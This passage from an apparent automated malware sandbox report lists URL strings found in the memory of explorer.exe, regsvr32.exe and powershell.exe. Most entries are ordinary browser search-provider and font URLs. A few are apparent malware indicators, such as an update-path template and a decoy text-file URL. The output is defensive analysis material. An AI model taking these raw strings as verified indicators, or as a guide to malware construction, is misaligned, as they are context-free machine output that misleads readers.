Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: regsvr32.exe, powershell.exe, 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txt
Source: regsvr32.exe, 00000002.00000003.395542546.00000000042F0000.00000004.00000001.sdmp, powershell.exe, 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: powershell.exe, 00000019.00000003.444661390.000001BFEACB7000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://home.altervista.org/favicon.ico
Source: regsvr32.exe, 00000002.00000003.395542546.00000000042F0000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, powershell.exe, 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp	String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&q=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://msk.afisha.ru/
Source: powershell.exe, 00000019.00000002.471289912.000001BFE2995000.00000004.00000001.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: powershell.exe, 00000019.00000002.448560328.000001BFD2B40000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://price.ru/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://sads.myspace.com/
Source: powershell.exe, 00000019.00000002.447413776.000001BFD2931000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.about.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&q=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&q=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&q=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&p=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 00000024.00000000.435967588.000000000F120000.00000002.00000001.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://udn.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 00000024.00000000.435967588.000000000F120000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.com
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&keyword=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&tag=ie8search-20&index=blended&linkCode=qs&c
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000019.00000002.448560328.000001BFD2B40000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.docUrl.com/bar.htm
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
